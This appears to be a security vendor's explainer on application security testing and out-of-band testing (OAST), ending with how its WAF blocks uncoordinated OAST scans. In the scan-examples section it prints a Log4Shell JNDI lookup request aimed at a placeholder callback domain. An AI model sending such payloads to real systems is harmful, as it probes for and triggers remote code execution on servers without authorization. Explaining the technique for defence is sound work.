1. What is AST?

Application security testing (AST) is an important component of IT security that focuses on identifying and mitigating vulnerabilities and weaknesses within software applications. AST encompasses a variety of techniques and tools designed to assess the security posture of applications, including web and mobile applications. The primary goal of an AST is to find potential security flaws, such as code vulnerabilities, misconfigurations, and logic flaws, that an attacker could exploit to compromise the confidentiality, integrity, or availability of an application and its data. By performing ASTs, organizations can proactively identify and remediate security risks to ensure the resilience and reliability of their applications in the face of evolving cyber threats.

2. Application Security Testing (AST) Categorization

AST(Application Security Testing) : Finding vulnerabilities or security holes in an application that can be exploited.

More integrated as you move up the pyramid

Image source : https://insights.sei.cmu.edu

• SAST(Static Application Security Testing): Analyzing the source code or binary of an application without running the program to check for security vulnerabilities
• DAST(Dynamic Application Security Testing): Testing vulnerabilities in running applications by simulating attacks and analyzing the response
• SCA(Software Composition Analysis) : Provides security vulnerabilities for all open source components used in application development
• Database Security Scanning : Scans databases for security vulnerabilities
• MAST(Mobile Application Security Testing) : Detects security vulnerabilities for mobile applications using static analysis, dynamic analysis, forensic techniques, and more.
• IAST(Interactive Application Security Testing) : Combines SAST (static analysis) and DAST (dynamic analysis) technologies to detect vulnerabilities in applications, effectively reducing false positives by analyzing source code before application compilation and detecting vulnerabilities in running applications.
• ASTaaS(AST as a Service) : Provides technologies such as static analysis (SAST), dynamic analysis (DAST), and penetration testing for applications as a cloud service.
• Correlation Tools : Tools to reduce false positives by collecting and analyzing the results of AST tools in a centralized repository.
• Test-Coverage Analyzers : A tool that measures the amount of code analyzed and divides it into specific ranges to check whether certain lines of code or logical branching statements are actually reached during program execution.
• ASTO(Application Security Testing Orchestration) : A unified platform to address the difficulty of integrating the results of AST tools from different vendors, as well as the time and cost of scanning and fixing vulnerabilities.

3. What is OAST?

Out-of-Band Application Security Testing (OAST) is a methodology used to assess the security of a web application by utilizing an external server to interact with the target application through an out-of-band channel.

Image source : https://omoknooni.tistory.com/m/116

As you can see from the figure above, unlike traditional testing methods, OAST does not rely solely on interactions within the application. Instead, it utilizes external communication channels such as DNS, HTTP, or other network protocols to identify vulnerabilities that are not visible with traditional testing approaches.

4. How OAST works

1. Identify the target: Identify the target web application or system to be tested for security vulnerabilities.

2. Set up an external server: Configure an external server to interact with the target application over an out-of-band channel.

3. Inject traffic: Inject test payloads or traffic into the target application through the external server to trigger potential vulnerabilities.

4. Response analysis: Analyze the responses received from the target application to identify abnormal behavior or security weaknesses.

5. Vulnerability detection: Detect vulnerabilities such as injection flaws, access control issues, or sensitive data exposure that may have been discovered through the OAST process.

5. Why use OAST?

• Detect hidden vulnerabilities: OAST can find vulnerabilities that traditional testing methods may miss, including those that can only be exploited through out-of-band channels.

• Comprehensive security coverage: OAST complements traditional security testing approaches to provide more comprehensive coverage and help identify blind spots in application security.

• Protection against advanced threats: OAST helps organizations defend against advanced threats by discovering vulnerabilities that attackers can exploit to compromise applications or their data.

6. OAST scan examples

Typical vulnerabilities that can be identified using OAST techniques.

• Out-of-band SQL injection (OOB SQLi)

• Blind XSS

• OS code injection

• Server-side request forgery

• XML foreign entity injection

It was also used to identify the previously highly publicized Log4Shell attack, which induced out-of-band (OOB) in the form of attaching vulnerable domains to subdomains to quickly identify vulnerable targets.

GET /?test=${jndi:ldap://${hostName}.oast.service} HTTP/1.1
Host: sample.com

7. Responding to OAST scans

There is a risk that an OAST scan could allow an attacker to identify vulnerable parts of the target and launch an attack.

The image below shows an attack that appears to have attempted to leverage Interacsh to scan for vulnerabilities using OAST techniques.

In AIWAF, we have measures in place to block OAST scanning that has not been coordinated with security personnel.

However, it is not always possible to register it as a permanent pattern as it can cause issues by detecting and blocking legitimate scanning, so we provide it as a custom pattern upon request.

8. References

• https://m.blog.naver.com
• https://portswigger.net/burp/application-security-testing/oast
• https://www.hahwul.com/cullinan/oast/
• https://insights.sei.cmu.edu/blog/10-types-of-application-security-testing-tools-when-and-how-to-use-them/